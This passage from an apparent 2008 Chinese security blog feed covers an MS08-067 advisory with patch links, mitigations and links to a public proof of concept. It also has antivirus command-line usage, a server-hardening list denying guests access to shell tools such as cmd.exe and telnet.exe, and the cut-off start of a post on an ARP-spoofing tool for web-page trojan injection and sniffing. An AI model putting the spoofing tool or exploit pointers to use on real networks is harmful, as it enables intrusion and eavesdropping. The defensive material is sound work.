>http://clin003.com/safe/discuz-wap-20081117-1584/</a> <br /> <a href="http://clin003.com/safe/discuz-wap-20081117-1584/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/discuz-wap-20081117-1584/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>今日杂碎：补丁</title>
		<link>http://clin003.com/safe/security-update-vulnerability-patch-1552/</link>
		<comments>http://clin003.com/safe/security-update-vulnerability-patch-1552/#comments</comments>
		<pubDate>Fri, 24 Oct 2008 17:07:36 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[Computer Browser]]></category>
		<category><![CDATA[MS08-067]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[微软]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=1552</guid>
		<description><![CDATA[中午的时候看到WP的升级版本，然后紧急升级，因为那个漏洞应该算是前阵子RSS阅读器报的漏洞的延续，只不过这次可以直接给WP服务器注入SHELL，很BT，谁让你开着发现都谁引用你的文章呢（在后台首页右侧偏上），然后就发现这个MS08-067，话说是微软24日凌晨破例紧急公布的！各大网站都说“其危害程度毫不逊于当年波及80%以上Windows用户的“冲击波”病毒。”。 Server服务在默认情况下都是自动运行的，而Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。 但是在公司若不是特别情况我想管理员都会把“Server和Computer Browser服务”这禁掉的（局域网文件共享需要的），网吧就可能有点不同啦，因为需要共享？需要开启这个，而因为这个漏洞引入一只蠕虫，那整个网络就不要想安宁啦，一点都不逊于ARP攻击！！   需要说明的是：对于Windows 2000、XP和Server 2003，无需认证便可以利用这个漏洞；对于Windows Vista和Server 2008，可能需要进行认证。 目前这个漏洞正在被名为TrojanSpy:Win32/Gimmiv.A和TrojanSpy:Win32/Gimmiv.A.dll的木马积极的利用。网上已出现了利用该漏洞的蠕虫病毒(Win32/MS08067.gen!A)。据360安全专家分析，这一漏洞的危害极为严重，黑客仅根据IP地址便可随意发起攻击，简直是“指哪打哪”，而且感染性非常强，只要远程执行一段下载恶意程序的代码，不但能随意弹出广告、盗取用户账号，还可以控制本机进而攻击其他用户，使破坏力持续放大，局域网的用户一旦有一个中招病毒就会迅速扩散。被认为是微软近一年半以来首次打破每月定期安全公告的惯例而发布更新。   解决办法1： 微软官方补丁下载地址： PoC已经被发布，请大家尽快转告安装补丁。我们已经看到大陆地区访问Update的客户端数量有少量减少，不过现在告诉所有人“请恢复启用Windows Automatic Update安装MS08-067，这么做不会下载正版验证WGA”，就像说“这狗不咬人”一样。所以下面把补丁的链接地址直接贴出，方便有所顾虑的用户尽快安装，谢谢！ 中文版的MS08-067补丁:  Windows XP 安全更新程序 (KB958644)  Windows 2000 安全更新程序 (KB958644)  Windows Server 2003 安全更新程序 (KB958644) 英文版的MS08-067补丁： Microsoft Windows 2000 Service Pack 4  Windows XP &#8230; <a href="http://clin003.com/safe/security-update-vulnerability-patch-1552/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>中午的时候看到WP的升级版本，然后紧急升级，因为那个漏洞应该算是前阵子RSS阅读器报的漏洞的延续，只不过这次可以直接给WP服务器注入SHELL，很BT，谁让你开着发现都谁引用你的文章呢（在后台首页右侧偏上），然后就发现这个<a href="http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx" target="_blank">MS08-067</a>，话说是微软24日凌晨破例紧急公布的！各大网站都说“其危害程度毫不逊于当年波及80%以上Windows用户的“冲击波”病毒。”。</p>
<p>Server服务在默认情况下都是自动运行的，而Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞，远程攻击者可以通过发送恶意的RPC请求触发这个溢出，导致完全入侵用户系统，以SYSTEM权限执行任意指令。</p>
<p>但是在公司若不是特别情况我想管理员都会把“Server和Computer Browser服务”这禁掉的（局域网文件共享需要的），网吧就可能有点不同啦，因为需要共享？需要开启这个，而因为这个漏洞引入一只蠕虫，那整个网络就不要想安宁啦，一点都不逊于ARP攻击！！</p>
<p> </p>
<p>需要说明的是：对于Windows 2000、XP和Server 2003，无需认证便可以利用这个漏洞；对于Windows Vista和Server 2008，可能需要进行认证。<br />
目前这个漏洞正在被名为TrojanSpy:Win32/Gimmiv.A和TrojanSpy:Win32/Gimmiv.A.dll的木马积极的利用。网上已出现了利用该漏洞的蠕虫病毒(Win32/MS08067.gen!A)。据<a href="http://baike.360.cn/recommend/3451604/13508762.html" target="_blank">360安全专家分析</a>，这一漏洞的危害极为严重，黑客仅根据IP地址便可随意发起攻击，简直是“指哪打哪”，而且感染性非常强，只要远程执行一段下载恶意程序的代码，不但能随意弹出广告、盗取用户账号，还可以控制本机进而攻击其他用户，使破坏力持续放大，局域网的用户一旦有一个中招病毒就会迅速扩散。被认为是微软近一年半以来首次打破每月定期安全公告的惯例而发布更新。</p>
<p> </p>
<p><strong>解决办法1：</strong></p>
<p>微软官方补丁下载地址：</p>
<blockquote><p>PoC已经被发布，请大家尽快转告安装补丁。我们已经看到大陆地区访问Update的客户端数量有少量减少，不过现在告诉所有人“请恢复启用Windows Automatic Update安装MS08-067，这么做不会下载正版验证WGA”，就像说“这狗不咬人”一样。所以下面把补丁的链接地址直接贴出，方便有所顾虑的用户尽快安装，谢谢！</p></blockquote>
<p>中文版的MS08-067补丁: <br />
<a href="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03" target="_blank">Windows XP 安全更新程序 (KB958644)</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=e22eb3ae-1295-4fe2-9775-6f43c5c2aed3" target="_blank">Windows 2000 安全更新程序 (KB958644)</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?displaylang=zh-cn&amp;FamilyID=f26d395d-2459-4e40-8c92-3de1c52c390d" target="_blank">Windows Server 2003 安全更新程序 (KB958644)</a></p>
<p>英文版的MS08-067补丁：</p>
<p><a href="http://www.microsoft.com/downloads/details.aspx?familyid=E22EB3AE-1295-4FE2-9775-6F43C5C2AED3">Microsoft Windows 2000 Service Pack 4</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03">Windows XP Service Pack 2</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=0D5F9B6E-9265-44B9-A376-2067B73D6A03">Windows XP Service Pack 3</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=4C16A372-7BF8-4571-B982-DAC6B2992B25">Windows XP Professional x64 Edition</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=4C16A372-7BF8-4571-B982-DAC6B2992B25">Windows XP Professional x64 Edition Service Pack 2</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=F26D395D-2459-4E40-8C92-3DE1C52C390D">Windows Server 2003 Service Pack 1</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=F26D395D-2459-4E40-8C92-3DE1C52C390D">Windows Server 2003 Service Pack 2</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=C04D2AFB-F9D0-4E42-9E1F-4B944A2DE400">Windows Server 2003 x64 Edition</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=C04D2AFB-F9D0-4E42-9E1F-4B944A2DE400">Windows Server 2003 x64 Edition Service Pack 2</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=AB590756-F11F-43C9-9DCC-A85A43077ACF">Windows Server 2003 with SP1 for Itanium-based Systems</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=AB590756-F11F-43C9-9DCC-A85A43077ACF">Windows Server 2003 with SP2 for Itanium-based Systems</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=18FDFF67-C723-42BD-AC5C-CAC7D8713B21">Windows Vista and Windows Vista Service Pack 1</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=A976999D-264F-4E6A-9BD6-3AD9D214A4BD">Windows Vista x64 Edition and Windows Vista x64 Edition Service Pack 1</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=25C17B07-1EFE-43D7-9B01-3DFDF1CE0BD7">Windows Server 2008 for 32-bit Systems</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=7B12018E-0CC1-4136-A68C-BE4E1633C8DF">Windows Server 2008 for x64-based Systems</a> <br />
<a href="http://www.microsoft.com/downloads/details.aspx?familyid=2BCF89EF-6446-406C-9C53-222E0F0BAF7A">Windows Server 2008 for Itanium-based Systems</a></p>
<p> </p>
<p><strong>解决办法2：</strong></p>
<p>禁用Server和Computer Browser服务。</p>
<p>在Windows Vista和Windows Server 2008上，阻断受影响的RPC标识符。在命令提示符中运行以下命令：<br />
    <br />
    netsh<br />
    <br />
然后在netsh环境中输入以下命令：</p>
<p>    netsh&gt;rpc<br />
    netsh rpc&gt;filter<br />
    netsh rpc filter&gt;add rule layer=um actiontype=block<br />
    netsh rpc filter&gt;add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188<br />
    netsh rpc filter&gt;add filter<br />
    netsh rpc filter&gt;quit</p>
<p>在防火墙阻断TCP 139和445端口。<br />
使用个人防火墙，如Internet连接防火墙。</p>
<p> </p>
<p> </p>
<p><strong>黑客眼中的MS08-067</strong></p>
<p> </p>
<p><a href="http://www.avertlabs.com/research/blog/index.php/2008/10/24/first-glimpse-into-ms08-067-exploits-in-the-wild/" target="_blank">First Glimpse into MS08-067 Exploits In The Wild</a> </p>
<p>On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).</p>
<p>When successful, hardcoded shellcode embedded within the malware, is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.</p>
<p>Just hours following the patch release, public source code has already been seen distributing on the Internet. What more can I say ? Patch your systems ! Yes, NOW !</p>
<p><a href="http://vil.nai.com/vil/content/v_152898.htm">Spy-Agent.da</a> and <a href="http://vil.nai.com/vil/content/v_152900.htm">Spy-Agent.da.dll </a>are now detected using the current 5414 DATs. See<a href="http://www.avertlabs.com/research/blog/index.php/2008/10/23/mcafee-coverage-of-the-microsoft-emergency-release/">Dave’s blog</a> for McAfee’s coverage.</p>
<p> </p>
<p> </p>
<p><a href="http://ruder.cdut.net/blogview.asp?logID=275" target="_blank">MS08-067, How great it is!</a></p>
<p>Actually, This is not a stack overflow, but a stack overrun vulnerability. </p>
<p>There are two copies, the first copy is OK, but when there is another &#8221;..\&#8221;, it will lead to start the another copy (repeat the first copy codes), the second copy firstly does not calculate the base pointer correctly (firstly it is basePointer-2, so the &#8217;JZ&#8217; checking in the loop of searching character &#8217;\' will never come ture), that lead to get an unexpected stack pointer which is below the base pointer, after the wrong calculation, it starts the second copy and uses the unexpected pointer as the first parameter of function &#8221;wcscpy()&#8221;, therefore, the wrong-calculation memory will be rewritten. The EIP will be controlled in the main function, probably.</p>
<p> </p>
<p> <br />
<a href="http://milw0rm.com/exploits/6824" target="_blank">MS Windows Server Service Code Execution PoC (MS08-067)</a><br />
 <br />
So play around a bit, you&#8217;ll get it working reliably&#8230;</p>
<p> </p>
<p> <br />
<a href="https://forums.symantec.com/syment/blog/article?message.uid=360454">Tracking MS08-067</a><br />
While we haven&#8217;t seen widespread exploitation of this issue, there have been reports of a certain file, &#8220;n2.exe,&#8221; being downloaded on compromised computers. This file copies another piece of malicious code onto the compromised computer. Symantec products already detect both of these files as Infostealer.<br />
 </p>
<p> </p>
<p>引用大牛蛙的话：做盗版的“受害者”好过做盗贼的受害者，看黑色桌面好过让黑客看到你的桌面。</p>
<p><a id="bp___v___r___postlist___EntryItems_ctl00_PostTitle" href="http://blogs.technet.com/secure/archive/2008/10/23/October-2008-Critical-Out-Of-Band-Bulletin.aspx">十月紧急额外安全公告</a></p>
<p>下图是SWI给出的各平台受MS08-067的影响图中文版，请参考。</p>
<p><span style="color: #0000ee; text-decoration: underline;"><a href="http://img.clin003.com/wp-content/uploads/2008/10/ms08-067_4.jpg"></a><a href="http://img.clin003.com/wp-content/uploads/2008/10/ms08-067_4.jpg"><img class="alignnone size-medium wp-image-1553" title="ms08-067_4" src="http://img.clin003.com/wp-content/uploads/2008/10/ms08-067_4-215x300.jpg" alt="" width="215" height="300" /></a></span></p>
<p> </p>
<p> </p>
<p> </p>
<p>微软发布额外安全更新MS08-067-紧急(更新补丁下载地址)</p>
<p><a href="http://blog.duba.net/read.php?27">http://blog.duba.net/read.php?27</a></p>
<p> </p>
<p> </p>
<p> </p>
<p>前些天微软的“黑屏”验证计划真是闹得肥肥羊羊，真比微软做广告推广来的容易多啦，话说大陆大半个天都是微软的啦，oO，正版验证也好，黑屏也好，只要微软不使诈，就不会中招的啦，想必也不会对大多数人造成伤害，哈哈哈:P 。</p>
<p>另外看到啦个很寒的个评论“<a href="http://www.022net.com/2008/10-24/441926343149479.html" target="_blank">微软威胁到了中国的国家安全</a>”，说的不是没有道理，只是，只是政治的事我不懂，也说不清，关于这个评论也不说啥啦，自己掂量吧！！</p>
<p> </p>
<p><strong>相关链接：</strong></p>
<p>Microsoft 安全公告 MS08-067</p>
<p> <a href="http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx">http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx</a></p>
<p> </p>
<p>Microsoft Windows Server Service RPC Vulnerability</p>
<p> <a href="http://www.us-cert.gov/cas/techalerts/TA08-297A.html">http://www.us-cert.gov/cas/techalerts/TA08-297A.html</a></p>
<p> </p>
<p>MS08-067 Released</p>
<p><a href="http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx">http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx</a></p>
<p> </p>
<p>Windows Server服务RPC请求缓冲区溢出漏洞（MS08-067）</p>
<p><a href="http://www.sebug.net/vulndb/4288/">http://www.sebug.net/vulndb/4288/</a></p>
<p> </p>
<p>Why Microsoft&#8217;s SDL Missed MS08-067 in their own words</p>
<p><a href="http://www.cgisecurity.org/2008/10/why-microsofts.html">http://www.cgisecurity.org/2008/10/why-microsofts.html</a></p>
<p> </p>
<p>Get Protected, Now!</p>
<p><a href="http://blogs.technet.com/mmpc/archive/2008/10/23/get-protected-now.aspx">http://blogs.technet.com/mmpc/archive/2008/10/23/get-protected-now.aspx</a></p>
<p> </p>
<p>MS08-067 and the SDL</p>
<p><a href="http://groups.google.com/group/ph4nt0m/browse_thread/thread/1158015c79b2758d/0561e0a9ec7ec21f?show_docid=0561e0a9ec7ec21f">http://groups.google.com/group/ph4nt0m/browse_thread/thread/1158015c79b2758d/0561e0a9ec7ec21f?show_docid=0561e0a9ec7ec21f</a></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/wp-use/upgrading-wordpress-263-1550/" rel="bookmark" title="Permanent Link: 紧急更新至WordPress 2.6.3">紧急更新至WordPress 2.6.3</a></li><li><a href="http://clin003.com/exploits/wordpress-2-8-1-security-bypass-0day-1763/" rel="bookmark" title="Permanent Link: WordPress < 2.8.1 Security Bypass 0day">WordPress < 2.8.1 Security Bypass 0day</a></li><li><a href="http://clin003.com/linux/fedora-11-yum-1832/" rel="bookmark" title="Permanent Link: 配置 yum 为 Fedora 11 快速更新软件">配置 yum 为 Fedora 11 快速更新软件</a></li><li><a href="http://clin003.com/ideas/discuz-plugin-exploits-1800/" rel="bookmark" title="Permanent Link: 使用Discuz插件的同学需要注意了">使用Discuz插件的同学需要注意了</a></li><li><a href="http://clin003.com/exploits/security-vulnerability-in-the-solaris-rpc-services-library-48/" rel="bookmark" title="Permanent Link: Sun Solaris RPC 服务库 librpcsvc 拒绝服务漏洞">Sun Solaris RPC 服务库 librpcsvc 拒绝服务漏洞</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/security-update-vulnerability-patch-1552/" >http://clin003.com/safe/security-update-vulnerability-patch-1552/</a> <br /> <a href="http://clin003.com/safe/security-update-vulnerability-patch-1552/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/security-update-vulnerability-patch-1552/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>从命令行查杀病毒『金山毒霸』</title>
		<link>http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/</link>
		<comments>http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/#comments</comments>
		<pubDate>Wed, 02 Apr 2008 06:38:21 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[kavdx]]></category>
		<category><![CDATA[命令行]]></category>
		<category><![CDATA[金山毒霸]]></category>

		<guid isPermaLink="false">http://clin003.com/?p=600</guid>
		<description><![CDATA[有时候不方便到界面下边或者为啦方便自己定制查杀病毒任务，这时命令行下的杀毒方式就显得很灵活实用啦（金山毒霸的屏保杀毒就是使用的命令行杀毒任务）。好啦下边看下金山毒霸查杀病毒命令格式。 C:\Program Files\Kingsoft\Kingsoft Internet Security 2008&#62;kavdx /help Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd Usage: KAVDX [drive:][path][filename] [{/&#124;-}&#60;switch&#62;[+&#124;-] &#8230;] Switch:          (+&#124;-: Enable&#124;Disable switch) ?&#124;H&#124;Help        &#8211; For help D               &#8211; Display default settings M               &#8211; Scan Memory &#8230; <a href="http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>有时候不方便到界面下边或者为啦方便自己定制查杀病毒任务，这时命令行下的杀毒方式就显得很灵活实用啦（金山毒霸的屏保杀毒就是使用的命令行杀毒任务）。好啦下边看下金山毒霸查杀病毒命令格式。</p>
<p>C:\Program Files\Kingsoft\Kingsoft Internet Security 2008&gt;kavdx /help</p>
<p>Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd</p>
<p>Usage:<br />
KAVDX [drive:][path][filename] [{/|-}&lt;switch&gt;[+|-] &#8230;]</p>
<p>Switch:          (+|-: Enable|Disable switch)<br />
?|H|Help        &#8211; For help<br />
D               &#8211; Display default settings<br />
M               &#8211; Scan Memory<br />
B               &#8211; Scan Boot area<br />
All             &#8211; Scan All files<br />
Z               &#8211; Scan archived file<br />
S               &#8211; Scan Sub directory<br />
HA              &#8211; Heuristic Analysis<br />
A{P|C|D|S|Q}    &#8211; Automate {Prompt|Clean|Delete|Skip|Quarantine} infected fi<br />
le(s)<br />
BAK             &#8211; Backup infected file(s) before clean<br />
Q               &#8211; Quarantine infected file(s) before clean<br />
CF{D|S|Q}       &#8211; When Clean Failed, {Delete|Skip|Quarantine} infected file(<br />
s)<br />
L&lt;LogName&gt;      &#8211; Virus Log with VirusInfoID</p>
<p>Thank you for using KAVScan!</p>
<p>kavdx是金山的杀毒引擎命令可在2000/XP/Vista 的 DOS 窗口下运行，也可以在纯 DOS 环境下运行。</p>
<p>（其他主流杀毒软件也有相应的命令需要的话请自行查看说明文档）</p>
<p>C:\Program Files\Kingsoft\Kingsoft Internet Security 2008&gt;kavdx /m /b d:\tools</p>
<p>Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd</p>
<p>* Loading AntiVirus Engine&#8230;Ok<br />
* AntiVirus Engine Version: 2008.1.14.15<br />
* Loading Virus DataBase&#8230;OK!<br />
* Virus Database Version: 2008.4.2.10</p>
<p>* Init AntiVirus Engine&#8230;Ok</p>
<p>* Scan Windows memory&#8230;<br />
OK!<br />
* Scan No.0 hard disk Master Boot Record&#8230;Ok!<br />
* Scan D: disk boot sector&#8230;Ok!</p>
<p>* Scanning Directiories/Files&#8230;</p>
<p>* Checked Files: 8<br />
* No Virus Found!</p>
<p>Thank you for using KAVScan!</p>
<p>上边这个例子就是扫描内存和引导区和d:\tools目录</p>
<p>若不带路径参数将使用默认的参数“/All-”（只扫描程序文件及文档文件）</p>
<p>默认参数是这样的：</p>
<p>C:\Program Files\Kingsoft\Kingsoft Internet Security 2008&gt;kavdx /d</p>
<p>Kingsoft AntiVirus Scan V3.0     Copyright (c) 1998, 2003 Kingsoft Co., Ltd</p>
<p>Default Settings:<br />
/M           : Scan Memory<br />
/B           : Scan Boot area<br />
/All-        : Only Scan program and document file<br />
/Z-          : Disable Scan archived file(s)<br />
/S           : Scan Sub directory<br />
/HA-         : Disable Heuristic Analysis<br />
/AP          : Prompt when found virus<br />
/BAK-        : Disable Backup infected file(s) before clean<br />
/Q-          : Disable Quarantine infected file(s) before clean<br />
/CFS         : When Clean Failed, Skip infected file(s)</p>
<p>Thank you for using KAVScan!</p>
<p>看下中文的说明：</p>
<p>命令行格式：[路径]KAVDX [指定驱动器][指定路径][指定文件] [{/|-}&lt;switch&gt;[+|-] &#8230;]<br />
+ 打开设置开关<br />
- 关闭设置开关<br />
无 （[指定驱动器][指定路径][指定文件]）时检查所有本地硬盘</p>
<p>switch（命令行转换参数）<br />
?|H|Help 显示帮助信息<br />
D 显示默认设置<br />
M 扫描内存<br />
B 扫描引导区<br />
All 扫描所有文件<br />
Z 检查压缩文件<br />
ZC 清除压缩文件内文件所染病毒（只支持可清除的压缩格式）<br />
S 扫描子目录<br />
HA 启动启发式查毒<br />
A{P|C|D|S|Q} 发现病毒{询问后处理|自动清除|自动删除|自动跳过|自动隔离}被感染的文件<br />
BAK 清除病毒前备份被感染的文件<br />
CF{D|S|Q} 当清除失败时自动{删除|跳过|隔离}被感染的文件</p>
<p>如果没有选择任何参数，程序会按默认值来进行查毒，默认的设置如下所示：<br />
/M 扫描内存<br />
/B 扫描引导区<br />
/All- 只扫描程序文件及文档文件<br />
/Z- 不扫描压缩文件中的文件<br />
/S 扫描子目录<br />
/HA- 不启动启发式查毒<br />
/AP 发现病毒询问后处理<br />
/BAK- 扫描子目录<br />
HA 清除文件中的病毒时不备份原始的文件</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/suggested-contents/malware-analysis-and-antivirus-technologies-1113/" rel="bookmark" title="Permanent Link: 病毒分析技术课程PDF版本">病毒分析技术课程PDF版本</a></li><li><a href="http://clin003.com/wp-use/wordpress262-upgrade-1475/" rel="bookmark" title="Permanent Link: 升级WordPress2.6.2">升级WordPress2.6.2</a></li><li><a href="http://clin003.com/debug/br-with-small-css-line-height-value-is-not-respected-by-the-renderer-1953/" rel="bookmark" title="Permanent Link: 当line-height小于18px时Chrome及webkit核心浏览器渲染问题">当line-height小于18px时Chrome及webkit核心浏览器渲染问题</a></li><li><a href="http://clin003.com/ideas/arp-counter-virus-attacks-1223/" rel="bookmark" title="Permanent Link: 反击arp病毒攻击">反击arp病毒攻击</a></li><li><a href="http://clin003.com/safe/virus-prevention-96/" rel="bookmark" title="Permanent Link: 预防病毒">预防病毒</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/" >http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/</a> <br /> <a href="http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/from-the-command-line-killing-virus-by-kingsoft-antivirus-600/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>服务器检查配置</title>
		<link>http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515/</link>
		<comments>http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515/#comments</comments>
		<pubDate>Tue, 11 Mar 2008 15:28:04 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[今日一点]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[安全配置]]></category>
		<category><![CDATA[服务器]]></category>

		<guid isPermaLink="false">http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515.shtml</guid>
		<description><![CDATA[1：使用netstat -naob查看开启的服务，然后配置防火墙，然后启用。 2：services.msc检查服务启动情况。 Error Reporting Service Microsoft Search Wireless Configuration 3：设置组策略gpedit.msc 4: Documents and Settings Program files目录，为Common Files目录之外的所有目录赋予Administrators和SYSTEM有 完全控制权。 5: at.exe attrib.exe cacls.exe cmd.exe debug.exe format.com ftp.exe net.exe net1.exe netstat.exe regedt32.exe telnet.exe scrrun.dll shell.dll 拒绝guest用户组访问 iis网站全局配置 。。。 不安全组件： regsvr32/u C:\WINDOWS\System32\wshom.ocx &#8230; <a href="http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>1：使用netstat -naob查看开启的服务，然后配置防火墙，然后启用。<br />
2：services.msc检查服务启动情况。<br />
Error Reporting Service<br />
Microsoft Search<br />
Wireless Configuration<br />
3：设置组策略gpedit.msc</p>
<p>4:<br />
Documents and Settings<br />
Program files目录，为Common Files目录之外的所有目录赋予Administrators和SYSTEM有</p>
<p>完全控制权。<br />
5:<br />
at.exe<br />
attrib.exe<br />
cacls.exe<br />
cmd.exe<br />
debug.exe<br />
format.com<br />
ftp.exe<br />
net.exe<br />
net1.exe<br />
netstat.exe<br />
regedt32.exe<br />
telnet.exe<br />
scrrun.dll<br />
shell.dll<br />
拒绝guest用户组访问</p>
<p>iis网站全局配置<br />
。。。<br />
不安全组件：<br />
regsvr32/u C:\WINDOWS\System32\wshom.ocx<br />
rename C:\WINDOWS\System32\wshom.ocx ws.bak.hom.ocx.bak<br />
regsvr32/u C:\WINDOWS\system32\shell32.dll<br />
rename C:\WINDOWS\system32\shell32.dll shell.bak.32.dll</p>
<p>sql扩展存储，php模块</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/servers/configuration-port-mapping-and-dns-map-h3c-ar18-21a-1796/" rel="bookmark" title="Permanent Link: 配置H3C AR18-21A路由器(Ethernet端口映射与公网域名映射)">配置H3C AR18-21A路由器(Ethernet端口映射与公网域名映射)</a></li><li><a href="http://clin003.com/servers/detection-using-telnet-to-return-at-the-head-of-the-state-code-information-450/" rel="bookmark" title="Permanent Link: 用telnet检测网址返回的头部信息状态码">用telnet检测网址返回的头部信息状态码</a></li><li><a href="http://clin003.com/suggested-contents/site-logs-240/" rel="bookmark" title="Permanent Link: site Logs">site Logs</a></li><li><a href="http://clin003.com/servers/h3c-ar18-21a-command-1515/" rel="bookmark" title="Permanent Link: H3C AR18-21A路由器(常用)配置命令">H3C AR18-21A路由器(常用)配置命令</a></li><li><a href="http://clin003.com/ideas/ping-google-music-by-g-top100-cn-1442/" rel="bookmark" title="Permanent Link: 某局对谷歌音乐下手啦？">某局对谷歌音乐下手啦？</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515/" >http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515/</a> <br /> <a href="http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/safe/logs-by-lin-for-check-server-configuration-515/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>zxarps.exe使用介绍</title>
		<link>http://clin003.com/safe/zxarps-show-512/</link>
		<comments>http://clin003.com/safe/zxarps-show-512/#comments</comments>
		<pubDate>Tue, 11 Mar 2008 08:22:25 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[代码调试]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[arp欺骗]]></category>
		<category><![CDATA[DNS欺骗]]></category>
		<category><![CDATA[zxarps]]></category>
		<category><![CDATA[嗅探]]></category>
		<category><![CDATA[网页插马]]></category>

		<guid isPermaLink="false">http://clin003.com/safe/zxarps-show-512.shtml</guid>
		<description><![CDATA[说明：需要winPcap 基于arp欺骗， 具体功能看下面的使用说明 基于ARP欺骗的东东，可网页插马，DNS欺骗，自定义关键字嗅探等 网络地址信息： 0. Realtek RTL8139 IP Address. . . . . : 192.168.1.101 Physical Address. . : 00-11-D8-6B-5E-19 Default Gateway . . : 192.168.1.1 1. WAN (PPP/SLIP) Interface IP Address. . . . . : xx.xx.xx.xx Physical &#8230; <a href="http://clin003.com/safe/zxarps-show-512/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>说明：需要winPcap 基于arp欺骗，<br />
具体功能看下面的使用说明</p>
